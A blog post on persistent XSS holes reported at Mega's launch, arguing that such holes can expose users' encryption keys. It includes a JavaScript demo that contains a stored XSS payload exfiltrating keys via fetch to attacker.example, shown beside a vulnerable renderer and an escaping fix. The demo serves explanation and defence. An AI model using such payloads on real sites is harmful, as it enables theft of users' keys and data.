Any new site, not just Mega, is going to have security holes, and reports have surfaced on Twitter, Reddit, and over on ZDNet that Mega has a couple of persistent (stored) XSS holes that are going to make users' days a little harder. Beyond the crypto issues you can read about on ZDNet, persistent XSS could, in the worst case, let an attacker steal the public/private keys the system generates for you, since script injected into the page runs in the same origin as the key material, and, in the best case, make it so that you cannot get to your data at all.
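To make the key-theft scenario concrete, here is an added illustration, not Mega's code and not a description of the actual holes that were reported: a hypothetical file-list renderer in a client-side-encryption web app, the kind of stored payload a persistent XSS plants in it, and the escaping fix. The `sessionKeys` values, the file names and the `attacker.example` URL are all constructed for the example.

```javascript
// Added illustration (not Mega's code): why a stored XSS in a client-side
// encryption app is so damaging, and the minimal fix.  Every value below is
// constructed for the example; the key strings are placeholders, not keys.

// Key material a client-side-crypto web app holds in page memory after login.
// Any script that runs in this page's origin can read it.
const sessionKeys = {
  publicKey: "PUB-EXAMPLE-0001",   // hypothetical
  privateKey: "PRIV-EXAMPLE-0001", // hypothetical
};

// Attacker-controlled file name that was accepted and stored by the server
// earlier (that is what makes the XSS "persistent").  When rendered raw, the
// onerror handler fires and posts the keys to the attacker's host.
const payloadName =
  '<img src=x onerror="fetch(\'https://attacker.example/?k=\' + ' +
  'encodeURIComponent(JSON.stringify(sessionKeys)))">';

// Constructed file list as the client might receive it from the server.
const fileList = [
  { name: "report.pdf", size: 10240 },
  { name: payloadName, size: 0 },
];

// Vulnerable renderer: concatenates untrusted names straight into HTML.
function renderVulnerable(files) {
  return files.map(f => `<li>${f.name} (${f.size} bytes)</li>`).join("\n");
}

// Minimal HTML escaping for text context: the five characters that matter.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Hardened renderer: same markup, but every untrusted value is escaped
// (in a real DOM you would use textContent instead of innerHTML).
function renderHardened(files) {
  return files
    .map(f => `<li>${escapeHtml(f.name)} (${escapeHtml(f.size)} bytes)</li>`)
    .join("\n");
}

// Crude check for this demo only: is there a raw tag carrying an on* event
// handler?  A browser would execute it.  The escaped output has no raw "<"
// from user data, so the check cannot fire on it.
function containsScriptableTag(html) {
  return /<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

console.log("vulnerable executes payload:", containsScriptableTag(renderVulnerable(fileList)));
console.log("hardened executes payload:  ", containsScriptableTag(renderHardened(fileList)));
```

The point of the demo is the blast radius, not the escaping itself: in an app that does its encryption in the browser, a stored XSS is not a defacement bug, it is a key-disclosure bug, because the injected handler reads `sessionKeys` directly from the page and ships it off-site.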
I am more interested in the XSS issues; read the ZDNet article for the crypto and password issue. You should also read TorrentFreak's article on Mega being sued and on people trying to cut off the payment processor of a service that is barely 48 hours old. Whatever happens with the launch of Mega, for all its hype and gold, Kim Dotcom is a person who is always going to be beat on, even if he tries to open up a good file locker. Someone is always going to take exception to anything he does. The payment processor issue will be years in the making.
But the XSS issue is much more interesting: you could not have a high-powered, highly visible launch like Mega's without attracting the attention of people who are going to push the envelope and see what they can get away with. On the day of launch, January 19th, Twitter started showing that people had been able to carry out a persistent XSS attack against Mega. Unfortunately the owner of the picture below is unknown (drop me a note so you can get credit for it; this picture is all over the internet).
The Twitter feed is just as interesting, but it tapers off as reports of the issues being fixed start hitting the news and social news services.
The interesting part of all this is that with such wide visibility, they should have hired a trained security team to at least help them out before they went live. It is very dangerous not to have someone doing a security evaluation of the code involved in a site like this. The good part is that Mega, and Kim Dotcom especially, has a large number of fans who would be willing to help out for free. The bad part is that Kim Dotcom has a lot of people who hate him over Megaupload and would happily take advantage of a security hole like this to compromise or shut down the new Mega system. The question is who is going to get there first.
Just some advice, for what it is worth: if you are doing any site launch, let alone a high-visibility launch like Mega's this week, have a security team, a good one, go through your system first and identify the easy security holes.
(Cross-posted @ Managing Intellectual Property & IT Security)